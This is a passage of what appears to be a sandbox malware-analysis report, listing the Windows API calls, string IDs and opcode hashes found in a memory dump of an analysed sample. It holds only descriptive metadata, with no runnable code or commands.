                                                    • Opcode Fuzzy Hash: 56234c4886751fd7ed601297f9dfce88abc85b9e3f98091dd53aa13d7258017e
                                                    • Instruction Fuzzy Hash: 8D31BC71A04219EBDB14CF68D94DAEE3FB5EB44325F114219FD24AA2D0C7B09924EB90
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 00F4BD9D
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F4BDBA
                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F4BDF2
                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F4BE18
                                                    • _wcsstr.LIBCMT ref: 00F4BE22
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                    • String ID:
                                                    • API String ID: 3902887630-0
                                                    • Opcode ID: 2e2829aac64200d67a16bbd788d53ac73e4fa8b05d6e526a85a2d417c364be3f
                                                    • Instruction ID: 5c54940b3defc0df5c1049bb0d4dd3a022ddb2f720933c7c8beb6dd1d4841d8c
                                                    • Opcode Fuzzy Hash: 2e2829aac64200d67a16bbd788d53ac73e4fa8b05d6e526a85a2d417c364be3f
                                                    • Instruction Fuzzy Hash: B3210732A04204BAEB255B759C09EBB7FACDF88760F104069FD09CA192EF65CC91B760
                                                    APIs
                                                      • Part of subcall function 00EF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00EF29F3
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F7B804
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F7B829
                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F7B841
                                                    • GetSystemMetrics.USER32(00000004), ref: 00F7B86A
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00F6155C,00000000), ref: 00F7B888
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$MetricsSystem
                                                    • String ID:
                                                    • API String ID: 2294984445-0
                                                    • Opcode ID: 62a6618cf343dd5e8fd3b7df0a4845dc79ec0b4201bf6ff6d79a64652d926408
                                                    • Instruction ID: 263b113880c0a53bd6a5f890285e583942bfd1ba233270e9416e4bfb6bb01438
                                                    • Opcode Fuzzy Hash: 62a6618cf343dd5e8fd3b7df0a4845dc79ec0b4201bf6ff6d79a64652d926408
                                                    • Instruction Fuzzy Hash: 1C21A631914219AFCB149F39CC04B6937A8FB46331F24873AF929D75E0D7308811EB92
                                                    APIs
                                                    • IsWindow.USER32(00000000), ref: 00F66159
                                                    • GetForegroundWindow.USER32 ref: 00F66170
                                                    • GetDC.USER32(00000000), ref: 00F661AC
                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00F661B8
                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00F661F3
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$ForegroundPixelRelease
                                                    • String ID:
                                                    • API String ID: 4156661090-0
                                                    • Opcode ID: 14b75fd8b76fc454b4b275c2f62ffe6cf134b57311ed5a391f4db985a273ddc6
                                                    • Instruction ID: 26c500d94c7bcd76088083b0973995eef3bd77cdcc8fc52634520e3ca40285a6
                                                    • Opcode Fuzzy Hash: 14b75fd8b76fc454b4b275c2f62ffe6cf134b57311ed5a391f4db985a273ddc6
                                                    • Instruction Fuzzy Hash: 3821C676A00608AFD700EF65DC88AAABBF5EF48311F048469F94AD7352DF30AC05DB90
                                                    APIs
                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00EF1729
                                                    • SelectObject.GDI32(?,00000000), ref: 00EF1738
                                                    • BeginPath.GDI32(?), ref: 00EF174F
                                                    • SelectObject.GDI32(?,00000000), ref: 00EF1778
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ObjectSelect$BeginCreatePath
                                                    • String ID:
                                                    • API String ID: 3225163088-0
                                                    • Opcode ID: cc6b5b046f5f57db895c76db790407afc6528504983c30dfdd2ea1aa239b13aa
                                                    • Instruction ID: cb50952b94245358937c333d165bdee00a2be08e16bc0a26dd17038b81771cb3
                                                    • Opcode Fuzzy Hash: cc6b5b046f5f57db895c76db790407afc6528504983c30dfdd2ea1aa239b13aa
                                                    • Instruction Fuzzy Hash: 9E21A13080430CEBDB11AF24EC887BA7BA8FB41325F244396F919A61E0D770D995EF90
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID:
                                                    • API String ID: 2931989736-0
                                                    • Opcode ID: 83cb80cbe058c9ad694e52acb880b5ab8bc0bc87433f588b984254d80c969fd2
                                                    • Instruction ID: 348a9057336c43446127c213584ce00123602f51cb53cad7eb8de6776f4afcaf
                                                    • Opcode Fuzzy Hash: 83cb80cbe058c9ad694e52acb880b5ab8bc0bc87433f588b984254d80c969fd2
                                                    • Instruction Fuzzy Hash: 4601B1B3B021057BE22466119C82FFB7B6CAA61794F044035FE0697742F7A6DE11B2E6
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00F55075
                                                    • __beginthreadex.LIBCMT ref: 00F55093
                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00F550A8
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F550BE
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F550C5
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                    • String ID:
                                                    • API String ID: 3824534824-0
                                                    • Opcode ID: 27f3107532743d76c62b90a5b809cdcdd2be30903fa2096e27253827a8157551
                                                    • Instruction ID: eb21fa0a19c230b545a2ea6a6d3a51b94c720b55bf0ee0488cde1a12b29e467f
                                                    • Opcode Fuzzy Hash: 27f3107532743d76c62b90a5b809cdcdd2be30903fa2096e27253827a8157551
                                                    • Instruction Fuzzy Hash: 3911257690870CABC7009BA89C48AEB7BACAB85721F140255FD14D3390D6718908ABE0
                                                    APIs
                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F48E3C
                                                    • GetLastError.KERNEL32(?,00F48900,?,?,?), ref: 00F48E46
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00F48900,?,?,?), ref: 00F48E55
                                                    • HeapAlloc.KERNEL32(00000000,?,00F48900,?,?,?), ref: 00F48E5C
                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F48E73
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 842720411-0
                                                    • Opcode ID: 1916eeb4dfe8b5d8ae58d0aa2312d135a48e6853208856952258de09caba6b2c
                                                    • Instruction ID: 34a12c62e0520a7b23dfe937f90792a1cd70f2f90751e8b4b89843c17e63ebfb
                                                    • Opcode Fuzzy Hash: 1916eeb4dfe8b5d8ae58d0aa2312d135a48e6853208856952258de09caba6b2c
                                                    • Instruction Fuzzy Hash: F701FB71601208AFDB205FA5DC88DAB7FADEF897A5B500569F849C3220DE319C15EB70
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F5581B
                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F55829
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F55831
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F5583B
                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F55877
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                    • String ID:
                                                    • API String ID: 2833360925-0
                                                    • Opcode ID: 25ec003777bad5ef197b8ba686b71ba771790734c0c8609ed081cfac2a594d6f
                                                    • Instruction ID: 97cc775f961e7a920beaaadb4ea300b882fdc7f0623f8ca1ec41f8fe68b4f7c8
                                                    • Opcode Fuzzy Hash: 25ec003777bad5ef197b8ba686b71ba771790734c0c8609ed081cfac2a594d6f
                                                    • Instruction Fuzzy Hash: D9015B31C01A1D9BCF009FE4D859AEDBBB8BB08B22F404156EA01B2140CB319558EBA1
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F48CDE
                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F48CE8
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F48CF7
                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F48CFE
                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F48D14
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: 945335ea5e79c51cf70a16b24b929b278449471a14b444e71c253070aa9e198d
                                                    • Instruction ID: 32fd78e05c967b170dfc57e6d79e8960340667bde5a0abaf9d515e679ad2da1b
                                                    • Opcode Fuzzy Hash: 945335ea5e79c51cf70a16b24b929b278449471a14b444e71c253070aa9e198d
                                                    • Instruction Fuzzy Hash: EEF08C31601208AFEB500FE49C8CEBB3FACEF497A4B504025F90482190DE609C05FB60
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F48D3F
                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F48D49
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F48D58
                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F48D5F
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F48D75
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: 9229da6349772c916102745226ce6c4c140e9e96f608bbfbd8080f29b4d82e40
                                                    • Instruction ID: 4ead693ba0b916a9f57b7e0d75f7b343daf7476836034f6c820bec3a7b4397e8
                                                    • Opcode Fuzzy Hash: 9229da6349772c916102745226ce6c4c140e9e96f608bbfbd8080f29b4d82e40
                                                    • Instruction Fuzzy Hash: C3F08C31601208AFEB510FA4EC88FBB3BACEF497A4F440115F95482290DE609D05FB60
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003E9), ref: 00F4CD90
                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00F4CDA7
                                                    • MessageBeep.USER32(00000000), ref: 00F4CDBF
                                                    • KillTimer.USER32(?,0000040A), ref: 00F4CDDB
                                                    • EndDialog.USER32(?,00000001), ref: 00F4CDF5
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                    • String ID:
                                                    • API String ID: 3741023627-0
                                                    • Opcode ID: 7c54886649d0b6d18fdceeef8c2c0ebb95d1bc82cec4f504cf88a2fa809acab3
                                                    • Instruction ID: 267d4d6f95a97aad2339b2faad91979facb46355655bfb26f5554a589c50dfea
                                                    • Opcode Fuzzy Hash: 7c54886649d0b6d18fdceeef8c2c0ebb95d1bc82cec4f504cf88a2fa809acab3
                                                    • Instruction Fuzzy Hash: 88018B31901708ABEB615B50DD4EBE67F78FF00715F400669F592A10D1EFF4A958ABC0
                                                    APIs
                                                    • EndPath.GDI32(?), ref: 00EF179B
                                                    • StrokeAndFillPath.GDI32(?,?,00F2BBC9,00000000,?), ref: 00EF17B7
                                                    • SelectObject.GDI32(?,00000000), ref: 00EF17CA
                                                    • DeleteObject.GDI32 ref: 00EF17DD
                                                    • StrokePath.GDI32(?), ref: 00EF17F8
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                    • String ID:
                                                    • API String ID: 2625713937-0
                                                    • Opcode ID: a314fb484cddff6646da219c31c7ff14b80cc0ffaeeb686dbaa12dcd63dd8def
                                                    • Instruction ID: 8690b59c6a0c0ab2786bcb2572e1eea2cb77b68449ac16e47b9bbbfde96771d9
                                                    • Opcode Fuzzy Hash: a314fb484cddff6646da219c31c7ff14b80cc0ffaeeb686dbaa12dcd63dd8def
                                                    • Instruction Fuzzy Hash: 44F0193000874CEBDB556F25EC8C7AA3BA4AB41326F648355E92D641F0CB30C999FF50
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 00F5CA75
                                                    • CoCreateInstance.OLE32(00F83D3C,00000000,00000001,00F83BAC,?), ref: 00F5CA8D
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                    • CoUninitialize.OLE32 ref: 00F5CCFA
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                    • String ID: .lnk
                                                    • API String ID: 2683427295-24824748
                                                    • Opcode ID: 699361e913946ccfa9645b68cd6fd8540da6618e95e245501bbf86ef66b0e9ef
                                                    • Instruction ID: 8c494ded164f9939fbb9599f3695955f7b5eb2c8bbf3474868fe183936ab3047
                                                    • Opcode Fuzzy Hash: 699361e913946ccfa9645b68cd6fd8540da6618e95e245501bbf86ef66b0e9ef
                                                    • Instruction Fuzzy Hash: C0A10BB1104205AFD300EF64CC91EABB7E8EF94714F40491DF656972E2EB71EA49CB92
                                                    APIs
                                                      • Part of subcall function 00F10FE6: std::exception::exception.LIBCMT ref: 00F1101C
                                                      • Part of subcall function 00F10FE6: __CxxThrowException@8.LIBCMT ref: 00F11031
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                      • Part of subcall function 00F01680: _memmove.LIBCMT ref: 00F016DB
                                                    • __swprintf.LIBCMT ref: 00EFE598
                                                    Strings
                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00EFE431
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                    • API String ID: 1943609520-557222456
                                                    • Opcode ID: 6bafadca70546116dabdc0d885c43c1ac0d0e0b620acfdf5f734b214f77a4c16
                                                    • Instruction ID: 5c9e48abfff88132eb1d1fc341b3b09b955c5506b50d2a0358a4abd979217b8a
                                                    • Opcode Fuzzy Hash: 6bafadca70546116dabdc0d885c43c1ac0d0e0b620acfdf5f734b214f77a4c16
                                                    • Instruction Fuzzy Hash: B8919E715082059FC724EF24CC86CBEB7A8FF95714F40491DF586A72A1EB24EE44EB92
                                                    APIs
                                                    • __startOneArgErrorHandling.LIBCMT ref: 00F152CD
                                                      • Part of subcall function 00F20320: __87except.LIBCMT ref: 00F2035B
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ErrorHandling__87except__start
                                                    • String ID: pow
                                                    • API String ID: 2905807303-2276729525
                                                    • Opcode ID: 05cb34b05fbb0c6b8032a711cfbdcec032caf15f0d97e39277277c858b3604e2
                                                    • Instruction ID: 34516ec6115f5241e0f71d71e0c2ec6db0d6207776f5c25de8a6204e9f94a8c7
                                                    • Opcode Fuzzy Hash: 05cb34b05fbb0c6b8032a711cfbdcec032caf15f0d97e39277277c858b3604e2
                                                    • Instruction Fuzzy Hash: 83515B63E09605D7CB11F714ED513FA7B909B80B60F308968E4D5862EAEF788CC5BB46
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #$+
                                                    • API String ID: 0-2552117581
                                                    • Opcode ID: 5793d6b1e0ec46a04acc800e97ef96e168600ba81d981220b2aefde8fd97be11
                                                    • Instruction ID: 334a0489c0fb063e1c8d48ca069dbb6a79d0d27a8e34f24976616172e761f648
                                                    • Opcode Fuzzy Hash: 5793d6b1e0ec46a04acc800e97ef96e168600ba81d981220b2aefde8fd97be11
                                                    • Instruction Fuzzy Hash: 7851E175904255CFDF259F68C880AFA7BA4BF5A320F144055EC91EB2D0DB74AC82EB62
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
